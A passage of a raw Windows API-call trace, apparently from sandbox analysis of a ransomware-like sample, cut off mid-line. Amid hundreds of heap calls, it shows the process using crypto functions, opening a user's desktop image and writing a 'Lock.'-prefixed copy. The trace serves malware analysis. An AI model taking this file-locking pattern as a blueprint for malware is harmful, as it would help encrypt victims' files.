RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0200.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0200.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0200.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0200.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0200.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0200.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0200.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0200.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0200.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0200.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0200.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0200.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0200.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0200.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0200.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0200.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0200.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0200.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0200.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0200.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0200.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0200.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0200.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0200.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0200.451] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0200.451] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0200.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.452] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0200.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0200.452] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0200.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0200.453] CryptDestroyHash (hHash=0xa87410) returned 1 [0200.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0200.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0200.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0200.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0200.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0200.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0200.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0200.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0200.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0200.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0200.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0200.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0200.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0200.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0200.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0200.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0200.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0200.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0200.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0200.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0200.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0200.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0200.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0200.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0200.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0200.454] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0200.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0200.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0200.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0200.454] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0200.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0200.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0200.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0200.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0200.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0200.456] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/P52g8.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\p52g8.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0200.457] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.457] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0200.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0200.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0200.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0200.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0200.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0200.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0200.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0200.457] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0200.458] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.P52g8.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.p52g8.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0200.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0200.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0200.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0200.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0200.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0200.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0200.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0200.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0200.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0200.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0200.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0200.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0200.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0200.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0200.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0200.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0200.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0200.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe52020 [0200.464] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0200.464] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0200.474] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x4227, lpOverlapped=0x0) returned 1 [0200.475] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0200.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0200.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0200.475] HeapFree (in: 